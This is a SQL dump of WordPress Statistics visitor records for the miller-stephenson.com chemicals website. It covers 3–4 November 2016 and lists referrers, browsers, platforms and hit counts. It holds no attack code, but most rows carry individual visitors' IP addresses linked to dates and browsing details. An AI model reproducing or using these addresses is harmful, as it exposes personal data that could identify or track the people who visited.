INSERT INTO `wp_statistics_visitor` VALUES (15140, '2016-11-03', 'https://www.miller-stephenson.com', 'Microsoft', 'Unknown', 'Unknown', '', '4.31.122.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15141, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '4.31.122.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15142, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '4.31.122.2', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15143, '2016-11-03', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '69.70.2.139', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15144, '2016-11-03', 'https://www.google.com', 'Firefox', 'Windows', '38.0', '', '156.65.13.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15145, '2016-11-03', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '54.0.2840.68', '', '208.54.90.167', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15146, '2016-11-03', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0ahUKEwjhhLqHmI3QAhVI22MKHYM8CI0QFghiMAg&url=https%3A%2F%2Fwww.miller-stephenson.com%2Fproduct%2Fsilicone-electronic-coating%2F&usg=AFQjCNE93Iy9SfWt1MNrAcL41ZXLFMFzyQ', 'MSIE', 'Windows', '11.0', '', '199.46.249.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15147, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '148.141.31.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15148, '2016-11-03', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '209.103.211.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15149, '2016-11-03', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '201.170.134.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15150, '2016-11-03', 'https://www.miller-stephenson.com/product/epikure-w/', 'Chrome', 'Windows', '54.0.2840.71', '', '71.9.127.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15151, '2016-11-03', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '8.0', '', '220.181.108.123', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15152, '2016-11-03', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiXsu7gm43QAhWCHYEKHVAwD9wYABAA&sig=AOD64_0Sbr_O-6XWaC7aGJtkOkNPD7F4tw&rct=j&q=&ved=0ahUKEwjn3ergm43QAhVM5yYKHUszC3gQ0QwIGQ&adurl=', 'MSIE', 'Windows', '11.0', '', '63.161.140.6', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15153, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '217.196.135.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15154, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '68.181.206.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15155, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '108.220.97.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15156, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '66.189.16.242', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15157, '2016-11-03', 'https://www.bing.com/search?q=miller+stepenson+904+epoxy&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '99.103.17.176', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15158, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '66.170.4.66', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15159, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '72.4.203.130', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15160, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15161, '2016-11-03', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '172.56.12.83', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15162, '2016-11-03', 'https://www.google.ee/', 'Firefox', 'Windows', '49.0', '', '90.191.221.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15163, '2016-11-03', 'https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwivxa6vpY3QAhXBEpQKHXW0AGMQFggyMAQ&url=https%3A%2F%2Fwww.miller-stephenson.com%2Fchemicals%2Fvazo%2F&usg=AFQjCNHY9PYcotxzZs4ETcH5s9OXED1qqw&bvm=bv.137132246,d.dGo', 'MSIE', 'Windows', '11.0', '', '103.51.159.249', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15164, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '172.17.27.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15165, '2016-11-03', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi7qNzOpo3QAhWJI4EKHXNhDm0YABAA&sig=AOD64_0Q3ZaOQmfNjW1g8FwS_aAAWnxq1w&rct=j&q=&ved=0ahUKEwiZldrOpo3QAhVGOiYKHZLdAAUQ0QwITA&adurl=', 'MSIE', 'Windows', '11.0', '', '208.114.63.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15166, '2016-11-03', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '205.200.250.250', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15167, '2016-11-03', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj4jOiYqI3QAhUUl34KHR7LDokYABAA&sig=AOD64_0qzg7Ygxt-UlywBZHl3pEURg1c1w&rct=j&q=&ved=0ahUKEwik2-WYqI3QAhVmsVQKHb4VDXIQ0QwIGQ&adurl=', 'MSIE', 'Windows', '11.0', '', '63.138.185.218', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15168, '2016-11-03', 'https://ukrup.com/', 'MSIE', 'Windows', '6.0', '', '134.249.53.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15169, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15170, '2016-11-03', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '35.0', '', '176.61.143.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15171, '2016-11-03', 'https://expo.spacecomexpo.com/SPC16/Public/eBooth.aspx?IndexInList=45&FromPage=Exhibitors.aspx&ParentBoothID=&ListByBooth=true&BoothID=322899', 'Chrome', 'Windows', '54.0.2840.87', '', '125.99.236.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15172, '2016-11-03', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '151.237.184.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15173, '2016-11-03', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiF4vGTqY3QAhVGYH4KHeHxDhYYABAA&sig=AOD64_3QnSC-SRiHB8TXTqPhxUnV4g5WSQ&rct=j&q=&ved=0ahUKEwiyme2TqY3QAhVBy2MKHV-9AIoQ0QwIGQ&adurl=', 'MSIE', 'Windows', '11.0', '', '173.166.13.101', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15174, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '70.184.88.101', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15175, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '73.85.200.157', '000', 40, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15176, '2016-11-03', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0ahUKEwikiK-9q43QAhWIdSYKHUYBCfsQFghEMAg&url=https%3A%2F%2Fwww.miller-stephenson.com%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=yF6f8MmTFdMTvDl8XFIZyg', 'MSIE', 'Windows', '11.0', '', '75.120.131.82', '000', 53, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15177, '2016-11-03', 'https://r.search.yahoo.com/RV=1/RE=1478230818/RB=/RO=8/RU=https%3a%2f%2fwww.miller-stephenson.com%2fchemicals%2fepoxy-resin-systems%2fepon-epoxy%2fepon-solid-epoxy-solutions%2f/RS=^ADA4va_RFut86mfO_jyl7vCXKAzp4c-', 'Safari', 'iPhone', '10.0', '', '142.197.84.148', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15178, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '84.183.115.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15179, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15180, '2016-11-03', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjdoIy-rI3QAhVGy1QKHUq2DnAQFggbMAA&url=https%3A%2F%2Fwww.miller-stephenson.com%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.cGw', 'MSIE', 'Windows', '11.0', '', '68.115.50.82', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15181, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '89.78.123.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15182, '2016-11-03', 'https://r.search.yahoo.com/_ylt=AwrTHRfUlBtY5XwAwGZXNyoA;_ylu=X3oDMTEycXRmNHI2BGNvbG8DZ3ExBHBvcwMxBHZ0aWQDQjI5NDFfMQRzZWMDc3I-/RV=2/RE=1478231381/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=yTHJAhuwDD8JHVXECKIr.QNRBlM-', 'Safari', 'Macintosh', '9.1.3', '', '108.89.99.53', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15183, '2016-11-03', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.1', '', '136.152.142.67', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15184, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.0', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15185, '2016-11-03', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '149.63.0.134', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15186, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '74.87.125.246', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15187, '2016-11-03', 'https://www.bing.com/search?q=krytox+206&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.252', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15188, '2016-11-03', 'https://www.miller-stephenson.com/krytox/', 'MSIE', 'Windows', '9.0', '', '204.79.180.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15189, '2016-11-03', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '12.104.178.218', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15190, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.199.142.76', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15191, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.28', '', '188.165.141.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15192, '2016-11-03', 'https://www.miller-stephenson.com/miller-stephenson/', 'Safari', 'iPad', '7.0', '', '198.45.139.72', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15193, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '150.250.176.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15194, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '163.185.148.245', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15195, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.255.73.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15196, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15197, '2016-11-03', 'https://www.bing.com/search?q=miller+stephenson+danbury+ct&qs=NH&pq=miller-stephenson+dan&sk=SC1NH1&sc=3-21&sp=3&cvid=AFBC016ACF69483295FDF46B10609A17&FORM=QBRE', 'MSIE', 'Windows', '11.0', '', '172.19.152.53', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15198, '2016-11-03', 'https://www.miller-stephenson.com/chemicals/specialty-products/', 'Firefox', 'Windows', '45.0', '', '130.76.24.20', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15199, '2016-11-03', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '68.115.50.82', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15200, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15201, '2016-11-03', 'https://www.adsensecustomsearchads.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '76.20.14.214', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15202, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '73.85.31.129', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15203, '2016-11-03', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '63.65.238.16', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15204, '2016-11-03', 'https://www.google.co.in/', 'Chrome', 'Windows', '54.0.2840.87', '', '106.51.24.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15205, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15206, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15207, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '50.203.142.38', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15208, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '128.219.49.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15209, '2016-11-03', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiB4MPbt43QAhVkwVQKHT8pDyIQFggbMAA&url=https%3A%2F%2Fwww.miller-stephenson.com%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.137132246,d.cGw', 'MSIE', 'Windows', '11.0', '', '108.68.32.81', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15210, '2016-11-03', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15211, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '10.93.0.200', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15212, '2016-11-03', 'https://www.google.com/aclk?sa=L&ai=DChcSEwje4_e8uo3QAhVQCZEKHRQGCYIYABAE&sig=AOD64_0dr14uHQL7QKc6md_MTC8XIUODMg&rct=j&frm=1&q=&ved=0ahUKEwiJnvS8uo3QAhVEl5AKHWwrCtwQ0QwIIw&adurl=', 'MSIE', 'Windows', '10.0', '', '63.149.147.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15213, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '12.207.168.162', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15214, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '64.113.114.53', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15215, '2016-11-03', 'https://www.adsensecustomsearchads.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '172.13.42.213', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15216, '2016-11-03', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.3', '', '107.141.184.19', '000', 31, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15217, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '40.87.70.28', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15218, '2016-11-03', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '4.16.99.1', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15219, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '98.229.178.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15220, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '67.53.232.114', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15221, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '98.229.178.118', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15222, '2016-11-03', 'https://r.search.yahoo.com/_ylt=AwrBT4cTrBtYNuwA0xpXNyoA;_ylu=X3oDMTEyMjhxOXF0BGNvbG8DYmYxBHBvcwM1BHZ0aWQDQjIzNzFfMQRzZWMDc3I-/RV=2/RE=1478237332/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fkrytox%2f/RK=0/RS=bB6HPAZ5xV.mS0RJnT0_kSY6hes-', 'Firefox', 'Windows', '49.0', '', '47.198.185.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15223, '2016-11-03', 'https://www.bing.com/search?q=EPON+828+SDS&src=IE-SearchBox&FORM=IENTTR&conversationid=&pc=EUPP_', 'MSIE', 'Windows', '11.0', '', '72.164.197.66', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15224, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15225, '2016-11-03', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwic_JKWx43QAhURKywKHZYBB1sQFgggMAA&url=https%3A%2F%2Fwww.miller-stephenson.com%2Fproduct%2Fepikure-3125%2F&usg=AFQjCNGfBmetEgEYfsQGZ2mQhDhcynChiQ', 'MSIE', 'Windows', '11.0', '', '165.156.24.5', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15226, '2016-11-03', 'https://www.adsensecustomsearchads.com/', 'Firefox', 'Macintosh', '49.0', '', '107.197.249.16', '000', 38, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15227, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '107.3.95.149', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15228, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '95.168.194.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15229, '2016-11-03', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '35.0', '', '188.208.1.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15230, '2016-11-03', 'https://www.miller-stephenson.com', 'scrapy-redis', 'Unknown', 'Unknown', '', '104.196.6.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15231, '2016-11-03', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '75.144.25.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15232, '2016-11-03', 'https://www.google.com/', 'Chrome', 'iPhone', '54.0.2840.66', '', '162.201.38.153', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15233, '2016-11-03', 'https://www.miller-stephenson.com', 'SafeDNSBot', 'Unknown', 'Unknown', '', '146.185.129.241', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15234, '2016-11-03', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '174.199.7.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15235, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '167.88.217.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15236, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '46.0', '', '95.213.184.35', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15237, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '209.213.42.223', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15238, '2016-11-03', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '129.115.2.38', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15239, '2016-11-03', 'https://www.adsensecustomsearchads.com/', 'Firefox', 'Windows', '49.0', '', '63.80.102.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15240, '2016-11-03', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '45.114.49.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15241, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '74.217.90.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15242, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '74.217.90.250', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15243, '2016-11-03', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '74.217.90.250', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15244, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15245, '2016-11-03', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15246, '2016-11-03', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '538.1', '', '104.155.116.223', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15247, '2016-11-03', 'mschemicals.com', 'Chrome', 'Windows', '5.0.375.99', '', '184.106.10.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15248, '2016-11-03', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '35.0', '', '89.42.145.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15249, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.96.163.158', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15250, '2016-11-03', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '89.42.145.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15251, '2016-11-03', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '89.42.145.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15252, '2016-11-03', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.228.164.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15253, '2016-11-03', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '192.146.217.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15254, '2016-11-03', 'https://www.google.com/', 'Firefox', 'Macintosh', '48.0', '', '72.94.151.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15255, '2016-11-03', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '54.0.2840.71', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15256, '2016-11-03', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '76.108.163.102', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15257, '2016-11-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.245.84', '000', 34, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15258, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15259, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15260, '2016-11-04', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0.1', '', '174.26.8.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15261, '2016-11-04', 'https://www.adsensecustomsearchads.com/', 'Edge', 'Windows', '13.10586', '', '66.91.16.115', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15262, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15263, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15264, '2016-11-04', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '208.167.254.88', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15265, '2016-11-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '65.55.218.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15266, '2016-11-04', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.66.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15267, '2016-11-04', 'https://xn--80aaafbn2bc2ahdfrfkln6l.xn--p1ai/', 'Unknown', 'Unknown', 'Unknown', '', '178.137.165.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15268, '2016-11-04', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjEkKmi943QAhXKWoYKHSHUDPIYABAA&sig=AOD64_2cvgl4oCxMJNCTnVPM5zA4v3KQ2Q&rct=j&q=&ved=0ahUKEwiE7qSi943QAhUI42MKHfQhB6wQ0QwIOQ&adurl=', 'MSIE', 'Windows', '11.0', '', '74.117.212.38', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15269, '2016-11-04', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '183.13.159.102', '000', 34, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15270, '2016-11-04', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '166.137.8.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15271, '2016-11-04', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '72.179.143.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15272, '2016-11-04', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (15273, '2016-11-04', 'https://www.bing.com/search?q=ms-472c&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.211', '000', 1, 0); 
